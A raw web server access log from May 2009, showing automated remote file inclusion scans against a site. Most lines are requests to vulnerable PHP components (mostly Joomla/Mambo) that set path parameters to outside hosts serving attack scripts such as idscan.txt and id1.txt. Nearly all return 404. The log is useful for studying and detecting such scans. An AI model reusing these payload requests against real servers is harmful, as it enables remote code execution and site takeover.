69.90.72.88 - - [14/May/2009:10:13:52 -0500] "GET /show.php?path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
67.69.254.243 - - [14/May/2009:10:14:26 -0500] "GET /logs/access_log.1222819200 HTTP/1.1" 200 12347 "http://www.google.co.za/search?hl=en&q=CLUB&meta=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)"
67.225.245.33 - - [14/May/2009:10:15:44 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dasin.net/games/idoff1.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
62.44.79.35 - - [14/May/2009:10:15:54 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
122.153.212.195 - - [14/May/2009:10:16:32 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:10:16:37 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [14/May/2009:10:16:41 -0500] "GET /logs/access_log.1239926400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:10:17:53 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:17:53 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
72.29.68.196 - - [14/May/2009:10:17:53 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
72.29.68.196 - - [14/May/2009:10:17:53 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.29.68.196 - - [14/May/2009:10:17:53 -0500] "GET /logs/access_log.1237248000/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
72.29.68.196 - - [14/May/2009:10:17:54 -0500] "GET /logs/access_log.1239667200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
119.110.108.106 - - [14/May/2009:10:18:09 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tugaspeed.info/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.63"
119.110.108.106 - - [14/May/2009:10:18:11 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tugaspeed.info/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.63"
72.52.230.168 - - [14/May/2009:10:21:18 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:10:21:18 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:10:21:18 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 377 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:23:30 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:23:30 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 377 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:23:30 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:10:25:06 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:25:06 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
218.249.36.194 - - [14/May/2009:10:25:16 -0500] "GET /include/lib.inc.php?site_path=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:10:25:16 -0500] "GET /logs/include/lib.inc.php?site_path=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:10:25:16 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.249.36.194 - - [14/May/2009:10:25:30 -0500] "GET /logs/access_log.1233878400/include/lib.inc.php?site_path=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.147.29.190 - - [14/May/2009:10:25:37 -0500] "GET //include/write.php?dir=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.147.29.190 - - [14/May/2009:10:25:37 -0500] "GET /logs//include/write.php?dir=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.147.29.190 - - [14/May/2009:10:25:37 -0500] "GET /logs/access_log.1235520000//include/write.php?dir=http://www.geocities.com/sandy_zazmit/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.106.135.14 - - [14/May/2009:10:26:26 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.106.135.14 - - [14/May/2009:10:26:27 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:10:26:31 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:10:26:31 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:10:26:33 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:10:26:33 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
207.57.79.26 - - [14/May/2009:10:26:44 -0500] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:10:26:44 -0500] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.825"
171.64.75.45 - - [14/May/2009:10:26:48 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:10:26:48 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:10:26:48 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:10:26:48 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
84.201.208.50 - - [14/May/2009:10:27:20 -0500] "GET /logs//administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:10:27:20 -0500] "GET /logs/access_log.1237248000//administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:10:27:20 -0500] "GET //administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:10:27:20 -0500] "GET /logs/access_log.1239667200//administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:10:27:56 -0500] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:10:27:56 -0500] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:10:27:56 -0500] "GET /logs/access_log.1239321600//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:10:28:00 -0500] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:10:28:01 -0500] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:10:28:01 -0500] "GET /logs/access_log.1239321600//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
217.18.76.16 - - [14/May/2009:10:28:58 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
217.18.76.16 - - [14/May/2009:10:28:58 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
208.64.202.134 - - [14/May/2009:10:29:18 -0500] "GET /logs/access_log.1240531200//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:10:29:18 -0500] "GET /logs/access_log.1240531200//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
24.39.162.98 - - [14/May/2009:10:29:23 -0500] "GET /logs/password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
24.39.162.98 - - [14/May/2009:10:29:24 -0500] "GET /password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
72.52.230.168 - - [14/May/2009:10:29:27 -0500] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:10:29:27 -0500] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.52.230.168 - - [14/May/2009:10:29:28 -0500] "GET /logs/access_log.1239321600//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
24.39.162.98 - - [14/May/2009:10:29:32 -0500] "GET /logs/password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
24.39.162.98 - - [14/May/2009:10:29:32 -0500] "GET /password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
72.52.230.168 - - [14/May/2009:10:30:04 -0500] "GET /logs/access_log.1240531200//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.113.230.73 - - [14/May/2009:10:31:21 -0500] "GET /logs/advertisers/ HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
208.113.230.73 - - [14/May/2009:10:31:21 -0500] "GET /advertisers/ HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
58.227.193.198 - - [14/May/2009:10:32:11 -0500] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:32:11 -0500] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:32:11 -0500] "GET /logs/access_log.1239321600//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:32:16 -0500] "GET /logs/access_log.1240531200//components/com_sef/sef.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
66.33.219.22 - - [14/May/2009:10:32:53 -0500] "GET /advertisers/ HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
66.33.219.22 - - [14/May/2009:10:32:54 -0500] "GET /logs/advertisers/ HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
119.110.108.106 - - [14/May/2009:10:33:16 -0500] "GET /logs//?path%5Bdocroot%5D=http://tugaspeed.info/oltre.txt? HTTP/1.1" 200 189322 "-""libwww-perl/5.63"
119.110.108.106 - - [14/May/2009:10:33:20 -0500] "GET //?path%5Bdocroot%5D=http://tugaspeed.info/oltre.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.63"
200.32.100.130 - - [14/May/2009:10:35:17 -0500] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:10:35:17 -0500] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.32.100.130 - - [14/May/2009:10:35:17 -0500] "GET /logs/access_log.1239321600//components/com_sef/sef.class.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:10:36:04 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:10:36:04 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:10:36:04 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:10:36:32 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:10:36:32 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:10:36:32 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:10:36:42 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.150.79.146 - - [14/May/2009:10:36:43 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:10:40:11 -0500] "GET //modules/xt_conteudo/admin/spaw/errors.php?error=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:10:40:11 -0500] "GET /logs/access_log.1235088000//modules/xt_conteudo/admin/spaw/errors.php?error=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:10:40:11 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/errors.php?error=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:10:40:18 -0500] "GET /logs/access_log.1235174400//modules/xt_conteudo/admin/spaw/errors.php?error=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:10:43:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:10:43:56 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:10:43:56 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
148.243.72.112 - - [14/May/2009:10:44:00 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shakur.sanjosedelmar.com/fx29id.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:10:44:48 -0500] "GET /logs/index.php?meio.php=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:44:49 -0500] "GET /index.php?meio.php=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:45:27 -0500] "GET /logs/index.php?visualizar=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:45:28 -0500] "GET /index.php?visualizar=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
66.232.102.70 - - [14/May/2009:10:46:38 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.232.102.70 - - [14/May/2009:10:46:38 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.232.102.70 - - [14/May/2009:10:46:38 -0500] "GET /logs/access_log.1239840000//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.232.102.70 - - [14/May/2009:10:47:08 -0500] "GET /logs/access_log.1239926400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:10:47:47 -0500] "GET /logs/main.php?pagina=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:47:48 -0500] "GET /main.php?pagina=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
62.44.79.35 - - [14/May/2009:10:47:58 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 305 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
69.90.72.88 - - [14/May/2009:10:48:49 -0500] "GET /logs/htmltonuke.php?filnavn=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:48:49 -0500] "GET /htmltonuke.php?filnavn=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:48:52 -0500] "GET /logs/index.php?configFile=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:48:52 -0500] "GET /index.php?configFile=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:50:02 -0500] "GET /logs/main.php?x=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:50:02 -0500] "GET /main.php?x=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
207.57.79.26 - - [14/May/2009:10:50:19 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:10:50:20 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.825"
58.227.193.198 - - [14/May/2009:10:52:56 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:52:56 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:52:56 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:10:53:16 -0500] "GET /logs/index2.php?content=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:10:53:16 -0500] "GET /index2.php?content=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.225.211.159 - - [14/May/2009:10:53:17 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:53:17 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:53:17 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:53:17 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:53:19 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:53:19 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:53:19 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.225.211.159 - - [14/May/2009:10:53:19 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
58.227.193.198 - - [14/May/2009:10:53:37 -0500] "GET /logs/access_log.1238112000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.44.79.35 - - [14/May/2009:11:01:32 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
62.44.79.35 - - [14/May/2009:11:01:32 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
65.55.106.115 - - [14/May/2009:11:01:49 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.115 - - [14/May/2009:11:03:00 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.110.19.178 - - [14/May/2009:11:03:22 -0500] "GET //setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
